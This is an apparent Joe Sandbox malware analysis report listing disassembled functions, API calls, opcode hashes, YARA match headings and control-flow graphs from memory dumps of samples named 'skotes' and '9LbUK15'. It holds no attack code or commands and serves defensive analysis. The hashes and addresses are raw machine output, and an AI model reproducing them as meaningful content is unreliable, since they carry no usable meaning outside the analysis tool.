                                                                                                                                              • Instruction Fuzzy Hash: ADF0A731700A306FE662AB55A811F6B23D49F44719F40951FE41B97282CE2CEC82CB99
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::critical_section::unlock.LIBCMT ref: 0041EFD1
                                                                                                                                                • Part of subcall function 0041F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041F989
                                                                                                                                                • Part of subcall function 0041F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041F9C0
                                                                                                                                                • Part of subcall function 0041F968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0041F9CC
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EFDD
                                                                                                                                                • Part of subcall function 0041F40F: Concurrency::critical_section::unlock.LIBCMT ref: 0041F433
                                                                                                                                              • Concurrency::Context::Block.LIBCONCRT ref: 0041EFE2
                                                                                                                                                • Part of subcall function 00420366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00420368
                                                                                                                                              • Concurrency::critical_section::lock.LIBCONCRT ref: 0041F002
                                                                                                                                                • Part of subcall function 0041F891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F8AC
                                                                                                                                                • Part of subcall function 0041F891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041F8B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 811866635-0
                                                                                                                                              • Opcode ID: 288a300020d859b1ef83b611f078531e2712a57bf32c35a77a8106ea6d39aef0
                                                                                                                                              • Instruction ID: fdf4501154c7c1c56dcdbec0c2722d580242c7d44f689b66cda82c1813ca1d84
                                                                                                                                              • Opcode Fuzzy Hash: 288a300020d859b1ef83b611f078531e2712a57bf32c35a77a8106ea6d39aef0
                                                                                                                                              • Instruction Fuzzy Hash: B2E0D834900100ABCB04FB21C4511DCBB61BF44324B00431EE461172E2CF385E8BCB88
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___free_lconv_mon
                                                                                                                                              • String ID: 8"F$`'F
                                                                                                                                              • API String ID: 3903695350-3117062166
                                                                                                                                              • Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                                                                                                                                              • Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
                                                                                                                                              • Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                                                                                                                                              • Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19
                                                                                                                                              APIs
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0043F232
                                                                                                                                              • __freea.LIBCMT ref: 0043F298
                                                                                                                                                • Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,EBA58D57,?,?,0041D3FC,EBA58D57,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap__alloca_probe_16__freea
                                                                                                                                              • String ID: ZC,mC
                                                                                                                                              • API String ID: 809856575-3499607563
                                                                                                                                              • Opcode ID: 48b0b541c6844b4bac158ef3165f1a4b931efef5229be1c1a5e2a9e78c2fb551
                                                                                                                                              • Instruction ID: dc497ce6df3af0ac8993855150aa88e2d431c8bd73d0ff441ae055568ba89d4f
                                                                                                                                              • Opcode Fuzzy Hash: 48b0b541c6844b4bac158ef3165f1a4b931efef5229be1c1a5e2a9e78c2fb551
                                                                                                                                              • Instruction Fuzzy Hash: C931F071D0020AEBDB209F65CC41EAF7BB8EF88314F04416AF914AB251DB399C55CBA8
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431764
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004317AF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pContext
                                                                                                                                              • API String ID: 3390424672-2046700901
                                                                                                                                              • Opcode ID: 9018f8aa5e2f1dcdf8aa9758c803532e755f7d857994937d6ffca288971cc1e0
                                                                                                                                              • Instruction ID: 942ad2940211714a74bcc9dfb36523be2d48a1416fc9e5f4f6d4d921a905eb8f
                                                                                                                                              • Opcode Fuzzy Hash: 9018f8aa5e2f1dcdf8aa9758c803532e755f7d857994937d6ffca288971cc1e0
                                                                                                                                              • Instruction Fuzzy Hash: 2F113639A002149BCB05FF58C88596D77A5AF8C365F18406BEC0297362DB3CED05CBD8
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00420CD7
                                                                                                                                              • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00420D2A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                                              • String ID: p[F
                                                                                                                                              • API String ID: 3303180142-1832964472
                                                                                                                                              • Opcode ID: 012c7f1a2334d7d7d61e610fd75b16390fda9d2be80b27e1d08c83141fa46920
                                                                                                                                              • Instruction ID: 460490d00550286d74d196cd5a9549fc7c942c0fed1932104b3464a6bc3d5762
                                                                                                                                              • Opcode Fuzzy Hash: 012c7f1a2334d7d7d61e610fd75b16390fda9d2be80b27e1d08c83141fa46920
                                                                                                                                              • Instruction Fuzzy Hash: 510180B0F156249EDB10ABBA755135DA6E06B08318FA0406FE405EB283DA7C5E41876E
                                                                                                                                              APIs
                                                                                                                                              • CreateSemaphoreExW.KERNEL32(?,004265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0041CAFC
                                                                                                                                              • CreateSemaphoreW.KERNEL32(?,004265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0041CB1E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateSemaphore
                                                                                                                                              • String ID: eB
                                                                                                                                              • API String ID: 1078844751-1684614082
                                                                                                                                              • Opcode ID: 0a75b26758247ccc1e2d1fda373b884fd510e78a53fedf65ba4e2f52d09dbcb4
                                                                                                                                              • Instruction ID: d803559eaad54cb2c3b4018db65bf1de4fef6802ea1d0146d559ec521011be2d
                                                                                                                                              • Opcode Fuzzy Hash: 0a75b26758247ccc1e2d1fda373b884fd510e78a53fedf65ba4e2f52d09dbcb4
                                                                                                                                              • Instruction Fuzzy Hash: 27F0B73A545129ABCF125F50EC0589E7F76FB08751B044065FD0996230C676AC61EF95
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042B94E
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B961
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pContext
                                                                                                                                              • API String ID: 548886458-2046700901
                                                                                                                                              • Opcode ID: 591562eb5e40e8e05a9c3289778601861637afb68b27e25a0bad12f2dc797774
                                                                                                                                              • Instruction ID: 6d6ffe11be8a4b1ace8c2f2c8a58b350c0e533cc07d7fbfc7cd1cba97992ca6a
                                                                                                                                              • Opcode Fuzzy Hash: 591562eb5e40e8e05a9c3289778601861637afb68b27e25a0bad12f2dc797774
                                                                                                                                              • Instruction Fuzzy Hash: 95E02B39B0020467CB04F7A5D845D9DBB789E84715710401BE911A3352EB78AA44C6D8
                                                                                                                                              APIs
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004234FC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pScheduler$version
                                                                                                                                              • API String ID: 2141394445-3154422776
                                                                                                                                              • Opcode ID: a5483bc7cd2a1e58a27b3e2178f53e3954a11aaa0d61c74f139fe87c3d2ed1cf
                                                                                                                                              • Instruction ID: 3122fea0a665ef1032727265859f97669ea40e48c80579a70b610642a631ca87
                                                                                                                                              • Opcode Fuzzy Hash: a5483bc7cd2a1e58a27b3e2178f53e3954a11aaa0d61c74f139fe87c3d2ed1cf
                                                                                                                                              • Instruction Fuzzy Hash: 28E04F34A40208B6CB26FE56E84BBC977749B1474BF94C157BC11111929BFCA78CCA89

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:9.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:79
                                                                                                                                              Total number of Limit Nodes:10
                                                                                                                                              execution_graph 15011 9bd738 15012 9bd77e GetCurrentProcess 15011->15012 15014 9bd7c9 15012->15014 15015 9bd7d0 GetCurrentThread 15012->15015 15014->15015 15016 9bd80d GetCurrentProcess 15015->15016 15017 9bd806 15015->15017 15020 9bd843 15016->15020 15017->15016 15018 9bd86b GetCurrentThreadId 15019 9bd89c 15018->15019 15020->15018 15021 9b4668 15022 9b467a 15021->15022 15023 9b4686 15022->15023 15027 9b4778 15022->15027 15032 9b4204 15023->15032 15025 9b46a5 15028 9b479d 15027->15028 15036 9b4888 15028->15036 15040 9b4878 15028->15040 15033 9b420f 15032->15033 15048 9b5c6c 15033->15048 15035 9b701a 15035->15025 15038 9b48af 15036->15038 15037 9b498c 15037->15037 15038->15037 15044 9b44e4 15038->15044 15042 9b4888 15040->15042 15041 9b498c 15041->15041 15042->15041 15043 9b44e4 CreateActCtxA 15042->15043 15043->15041 15045 9b5918 CreateActCtxA 15044->15045 15047 9b59db 15045->15047 15049 9b5c77 15048->15049 15052 9b5c8c 15049->15052 15051 9b73ed 15051->15035 15053 9b5c97 15052->15053 15056 9b5cbc 15053->15056 15055 9b74c2 15055->15051 15057 9b5cc7 15056->15057 15060 9b5cec 15057->15060 15059 9b75c5 15059->15055 15062 9b5cf7 15060->15062 15061 9b8909 15061->15059 15062->15061 15064 9bd061 15062->15064 15065 9bd091 15064->15065 15066 9bd0b5 15065->15066 15069 9bd210 15065->15069 15073 9bd220 15065->15073 15066->15061 15070 9bd22d 15069->15070 15071 9bd267 15070->15071 15077 9bba80 15070->15077 15071->15066 15075 9bd22d 15073->15075 15074 9bd267 15074->15066 15075->15074 15076 9bba80 3 API calls 15075->15076 15076->15074 15078 9bba8b 15077->15078 15080 9bdf78 15078->15080 15081 9bd384 15078->15081 15080->15080 15082 9bd38f 15081->15082 15083 9b5cec 3 API calls 15082->15083 15084 9bdfe7 15083->15084 15085 9bdff6 15084->15085 15088 9be060 15084->15088 15094 9be051 15084->15094 15085->15080 15089 9be08e 15088->15089 15090 9bd420 
GetFocus 15089->15090 15091 9be0b7 15089->15091 15093 9be15f 15089->15093 15090->15091 15092 9be15a KiUserCallbackDispatcher 15091->15092 15091->15093 15092->15093 15095 9be08e 15094->15095 15096 9bd420 GetFocus 15095->15096 15097 9be0b7 15095->15097 15099 9be15f 15095->15099 15096->15097 15098 9be15a KiUserCallbackDispatcher 15097->15098 15097->15099 15098->15099 15100 9bd980 DuplicateHandle 15101 9bda16 15100->15101 15102 9bafb0 15105 9bb097 15102->15105 15103 9bafbf 15106 9bb0dc 15105->15106 15107 9bb0b9 15105->15107 15106->15103 15107->15106 15108 9bb2e0 GetModuleHandleW 15107->15108 15109 9bb30d 15108->15109 15109->15103

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 295 9bd729-9bd7c7 GetCurrentProcess 299 9bd7c9-9bd7cf 295->299 300 9bd7d0-9bd804 GetCurrentThread 295->300 299->300 301 9bd80d-9bd841 GetCurrentProcess 300->301 302 9bd806-9bd80c 300->302 304 9bd84a-9bd865 call 9bd907 301->304 305 9bd843-9bd849 301->305 302->301 307 9bd86b-9bd89a GetCurrentThreadId 304->307 305->304 309 9bd89c-9bd8a2 307->309 310 9bd8a3-9bd905 307->310 309->310
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD7B6
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 009BD7F3
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD830
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 009BD889
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                              • Opcode ID: bdcd7b34a42257001d524964383bb992cdaba5b4c8e458cf2fbf7055bcd31a29
                                                                                                                                              • Instruction ID: 3a0cf96d4c10d7e2b9d9f0fc96d28261d4c12e28d8df9da702c4a9e4b7dc27f7
                                                                                                                                              • Opcode Fuzzy Hash: bdcd7b34a42257001d524964383bb992cdaba5b4c8e458cf2fbf7055bcd31a29
                                                                                                                                              • Instruction Fuzzy Hash: D95169B0D013498FDB14DFAAD548BDEBBF1AF88314F208469E419A73A0DB745984CF65

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 317 9bd738-9bd7c7 GetCurrentProcess 321 9bd7c9-9bd7cf 317->321 322 9bd7d0-9bd804 GetCurrentThread 317->322 321->322 323 9bd80d-9bd841 GetCurrentProcess 322->323 324 9bd806-9bd80c 322->324 326 9bd84a-9bd865 call 9bd907 323->326 327 9bd843-9bd849 323->327 324->323 329 9bd86b-9bd89a GetCurrentThreadId 326->329 327->326 331 9bd89c-9bd8a2 329->331 332 9bd8a3-9bd905 329->332 331->332
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD7B6
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 009BD7F3
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD830
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 009BD889
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                              • Opcode ID: c8f53f539447b18880a08c9cf88f452958926347640009fd2a07e98e27ec2e2f
                                                                                                                                              • Instruction ID: 5d54e41d2c491f77796f882cc87b3f299c2db8ec7f3fb3aa863014e47e498715
                                                                                                                                              • Opcode Fuzzy Hash: c8f53f539447b18880a08c9cf88f452958926347640009fd2a07e98e27ec2e2f
                                                                                                                                              • Instruction Fuzzy Hash: 8F5139B09017098FDB14DFAAD648BDEBBF1AF88314F20C469E419A7360DB749984CF65

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 361 9bb097-9bb0b7 362 9bb0b9-9bb0c6 call 9ba400 361->362 363 9bb0e3-9bb0e7 361->363 370 9bb0c8 362->370 371 9bb0dc 362->371 364 9bb0fb-9bb13c 363->364 365 9bb0e9-9bb0f3 363->365 372 9bb149-9bb157 364->372 373 9bb13e-9bb146 364->373 365->364 416 9bb0ce call 9bb332 370->416 417 9bb0ce call 9bb340 370->417 371->363 375 9bb17b-9bb17d 372->375 376 9bb159-9bb15e 372->376 373->372 374 9bb0d4-9bb0d6 374->371 377 9bb218-9bb2d8 374->377 378 9bb180-9bb187 375->378 379 9bb169 376->379 380 9bb160-9bb167 call 9ba40c 376->380 411 9bb2da-9bb2dd 377->411 412 9bb2e0-9bb30b GetModuleHandleW 377->412 382 9bb189-9bb191 378->382 383 9bb194-9bb19b 378->383 381 9bb16b-9bb179 379->381 380->381 381->378 382->383 385 9bb1a8-9bb1b1 call 9ba41c 383->385 386 9bb19d-9bb1a5 383->386 392 9bb1be-9bb1c3 385->392 393 9bb1b3-9bb1bb 385->393 386->385 394 9bb1e1-9bb1ee 392->394 395 9bb1c5-9bb1cc 392->395 393->392 401 9bb211-9bb217 394->401 402 9bb1f0-9bb20e 394->402 395->394 397 9bb1ce-9bb1de call 9ba42c call 9ba43c 395->397 397->394 402->401 411->412 413 9bb30d-9bb313 412->413 414 9bb314-9bb328 412->414 413->414 416->374 417->374
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 009BB2FE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 418 9b590c-9b5916 420 9b5918-9b59d9 CreateActCtxA 418->420 422 9b59db-9b59e1 420->422 423 9b59e2-9b5a3c 420->423 422->423 430 9b5a4b-9b5a4f 423->430 431 9b5a3e-9b5a41 423->431 432 9b5a51-9b5a5d 430->432 433 9b5a60 430->433 431->430 432->433 435 9b5a61 433->435 435->435
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 009B59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 436 9b44e4-9b59d9 CreateActCtxA 439 9b59db-9b59e1 436->439 440 9b59e2-9b5a3c 436->440 439->440 447 9b5a4b-9b5a4f 440->447 448 9b5a3e-9b5a41 440->448 449 9b5a51-9b5a5d 447->449 450 9b5a60 447->450 448->447 449->450 452 9b5a61 450->452 452->452
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 009B59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 453 9bd980-9bda14 DuplicateHandle 454 9bda1d-9bda3a 453->454 455 9bda16-9bda1c 453->455 455->454
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009BDA07
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 458 9bd978-9bda14 DuplicateHandle 459 9bda1d-9bda3a 458->459 460 9bda16-9bda1c 458->460 460->459
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009BDA07
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 463 9bb298-9bb2d8 464 9bb2da-9bb2dd 463->464 465 9bb2e0-9bb30b GetModuleHandleW 463->465 464->465 466 9bb30d-9bb313 465->466 467 9bb314-9bb328 465->467 466->467
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 009BB2FE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3314962822.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_95d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fdeddddd3c77ae88e003f7ad623724e94f3cefc6ab386c74d8007e63735b1b31
                                                                                                                                              • Instruction ID: 5d3344cdb6e9aab7559e91e9ad878daf88f50db84aff9fa417a1022a8194ca5b
                                                                                                                                              • Opcode Fuzzy Hash: fdeddddd3c77ae88e003f7ad623724e94f3cefc6ab386c74d8007e63735b1b31
                                                                                                                                              • Instruction Fuzzy Hash: 9401A77110B3409AE720DA17CD94767FF9CEF51325F18C829ED494B296C2799848D771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3314962822.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_95d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 59dcc6ed4805fde6533da8ce66f94d932818ab1b10fe05acd6c752ce2fb4dbaa
                                                                                                                                              • Instruction ID: 77a7e97be635ba6f8ce61a53dfa6be9dc22d3cc32e4213d550d541aba592b2a6
                                                                                                                                              • Opcode Fuzzy Hash: 59dcc6ed4805fde6533da8ce66f94d932818ab1b10fe05acd6c752ce2fb4dbaa
                                                                                                                                              • Instruction Fuzzy Hash: 19F0627140A3449AE7208A16CC84B66FFACEF51725F18C45AED484B296C2799C44CB71